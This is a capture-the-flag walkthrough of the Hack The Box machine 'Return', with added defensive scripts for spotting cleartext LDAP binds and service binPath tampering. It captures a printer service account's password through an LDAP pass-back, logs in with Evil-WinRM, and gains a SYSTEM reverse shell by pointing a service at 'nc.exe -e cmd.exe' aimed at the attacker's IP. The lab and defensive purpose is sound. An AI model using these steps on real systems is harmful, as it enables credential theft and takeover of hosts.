HTB Return

$ nmap -sV -p- 10.10.11.108 -Pn --min-rate 5000

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2022-01-22 22:59:02Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49671/tcp open  msrpc         syn-ack Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         syn-ack Microsoft Windows RPC
49679/tcp open  msrpc         syn-ack Microsoft Windows RPC
49682/tcp open  msrpc         syn-ack Microsoft Windows RPC
49694/tcp open  msrpc         syn-ack Microsoft Windows RPC
64882/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap done: 1 IP address (1 host up) scanned in 77.08 seconds

http://10.10.11.108/

http://10.10.11.108/settings.php

If we enter our own IP address in the Server Address field and listen on the LDAP port (389), the printer tries to authenticate to us:

$ sudo nc -lvnp 389

listening on [any] 389 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.108] 64083
0*`%return\svc-printer�
                       1edFg43012!!

We get a connection, and because the printer authenticates with an LDAP simple bind, the svc-printer account name and its password arrive in cleartext.

svc-printer:1edFg43012!!

You can read more about this technique here.
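The capture above is an LDAP BindRequest with simple authentication, which is why the account and password show up in the clear. The decoder below is an added example, not code from the original writeup; it walks the BER structure of such a message and produces the alert a defender would raise for any simple bind seen on unencrypted port 389. The sample bytes are constructed to mirror the capture's layout, with a placeholder password.

```python
def _read_tlv(buf, pos):
    """Return (tag, value, next_pos) for one BER TLV starting at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: low 7 bits = byte count
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def parse_bind_request(pkt):
    """Decode an LDAPMessage carrying a BindRequest (RFC 4511, BER-encoded)."""
    tag, body, _ = _read_tlv(pkt, 0)
    if tag != 0x30:                        # LDAPMessage ::= SEQUENCE
        raise ValueError("not an LDAPMessage")
    _, msgid, pos = _read_tlv(body, 0)     # INTEGER messageID
    tag, bind, _ = _read_tlv(body, pos)
    if tag != 0x60:                        # [APPLICATION 0] BindRequest
        raise ValueError("not a BindRequest")
    _, version, pos = _read_tlv(bind, 0)   # INTEGER version (3)
    _, name, pos = _read_tlv(bind, pos)    # OCTET STRING name (account / DN)
    auth_tag, secret, _ = _read_tlv(bind, pos)
    return {
        "message_id": int.from_bytes(msgid, "big"),
        "version": int.from_bytes(version, "big"),
        "name": name.decode(),
        # [0] simple = password in the clear; [3] = SASL (e.g. GSSAPI/Kerberos)
        "simple_bind": auth_tag == 0x80,
        "secret_len": len(secret),
    }


def cleartext_bind_alert(pkt):
    """Alert text for a simple bind seen on plain LDAP, or None if SASL."""
    info = parse_bind_request(pkt)
    if not info["simple_bind"]:
        return None
    return (f"cleartext LDAP simple bind as '{info['name']}' "
            f"({info['secret_len']}-byte password on the wire)")


# Constructed sample: same TLV layout as the capture above (0x30 0x2a ...
# 0x60 0x25 ...), but with a placeholder password instead of the real one.
SAMPLE = (b"\x30\x2a" + b"\x02\x01\x01" + b"\x60\x25" + b"\x02\x01\x03"
          + b"\x04\x12" + b"return\\svc-printer"
          + b"\x80\x0c" + b"EXAMPLE-pw12")

if __name__ == "__main__":
    print(cleartext_bind_alert(SAMPLE))
```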

According to the nmap scan, WinRM is available, so we can try to use Evil-WinRM to connect to the machine.

5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

If it is not already installed on your machine, you can install it with this Ruby gem command:

# gem install evil-winrm

$ evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents> 

From here we just need to grab the user flag.

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt

1c6eXXXXXXXXXXXXXXXXXXXXXXXXXXXX

For privilege escalation, we start by checking the user's details:

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> net user svc-printer

User name                    svc-printer
Full Name                    SVCPrinter
Comment                      Service Account for Printer
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2021 12:15:13 AM
Password expires             Never
Password changeable          5/27/2021 12:15:13 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/26/2021 12:39:29 AM

Logon hours allowed          All

Local Group Memberships      *Print Operators      *Remote Management Use
                             *Server Operators
Global Group memberships     *Domain Users
The command completed successfully.

This user belongs to the group «Server Operators».

According to the Microsoft documentation,

…Members of the Server Operators group can sign in to a server interactively, create and delete network shared resources, start and stop services, back up and restore files, format the hard disk drive of the computer, and shut down the computer. …

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-serveroperators

Because Server Operators can start and stop services, we first upload a netcat binary:

*Evil-WinRM* PS C:\Users\svc-printer\Documents> upload /usr/share/windows-binaries/nc.exe

Info: Uploading /usr/share/windows-binaries/nc.exe to C:\Users\svc-printer\Documents\nc.exe
Data: 79188 bytes of 79188 bytes copied

Info: Upload successful!

Now we can reconfigure an existing service (here vss, the Volume Shadow Copy service) so that its binary path points at the uploaded nc.exe, then restart it so the service runs our binary as SYSTEM.

More information about sc.exe and its options can be found here.

*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.14 1234"
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe stop vss
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe start vss

$ sudo nc -lvnp 1234

listening on [any] 1234 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.11.108] 52509
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

C:\Windows\system32>whoami

whoami
nt authority\system

And finally, we get the root flag.

0e21XXXXXXXXXXXXXXXXXXXXXXXXXXXX
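Rewriting a service's binPath to a file under a user profile leaves clear traces: the service's ImagePath registry value changes, and sc.exe is launched with config ... binPath=. The script below is an added detection example, not part of the original writeup; it assumes records shaped like Sysmon Event ID 13 (registry value set) and Security Event 4688 (process creation), with constructed sample data and field names of its own rather than a vendor schema.

```python
import re

SAFE_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
_SC_CONFIG = re.compile(r"\bsc(?:\.exe)?\b.*\bconfig\b.*\bbinpath\s*=", re.I)
_IMAGEPATH = re.compile(r"\\services\\([^\\]+)\\imagepath$", re.I)


def _normalize(path):
    """Lower-case, strip a leading quote and expand %SystemRoot% for comparison."""
    path = path.strip().lstrip('"').lower()
    return path.replace("%systemroot%", "c:\\windows")


def check_event(ev):
    """Return a finding string if the record looks like service tampering."""
    if ev["id"] == 13:                           # Sysmon: registry value set
        m = _IMAGEPATH.search(ev["target"])
        if not m:
            return None
        new_path = _normalize(ev["details"])
        if new_path.startswith(SAFE_ROOTS):      # still a protected location
            return None
        return (f"service '{m.group(1)}' ImagePath rewritten by {ev['user']} "
                f"to user-writable location: {new_path}")
    if ev["id"] == 4688 and _SC_CONFIG.search(ev["cmdline"]):   # process creation
        return f"sc.exe config binPath= run by {ev['user']}: {ev['cmdline']}"
    return None


def scan(events):
    """All findings for a list of event records, in order."""
    return [f for f in map(check_event, events) if f]


# Constructed sample records (field names are this example's own, not a vendor schema).
EVENTS = [
    {"id": 13, "user": "RETURN\\svc-printer",
     "target": "HKLM\\System\\CurrentControlSet\\Services\\VSS\\ImagePath",
     "details": "C:\\Users\\svc-printer\\Documents\\nc.exe -e cmd.exe 10.0.0.5 1234"},
    {"id": 13, "user": "NT AUTHORITY\\SYSTEM",                # legitimate value
     "target": "HKLM\\System\\CurrentControlSet\\Services\\VSS\\ImagePath",
     "details": "%SystemRoot%\\system32\\vssvc.exe"},
    {"id": 4688, "user": "RETURN\\svc-printer",
     "cmdline": 'sc.exe config vss binPath="C:\\Users\\svc-printer\\Documents\\nc.exe"'},
    {"id": 4688, "user": "RETURN\\admin", "cmdline": "sc.exe query vss"},
]
```

Running scan(EVENTS) yields two findings: the ImagePath rewrite to nc.exe and the sc.exe config command, while the legitimate vssvc.exe value and the sc.exe query are ignored.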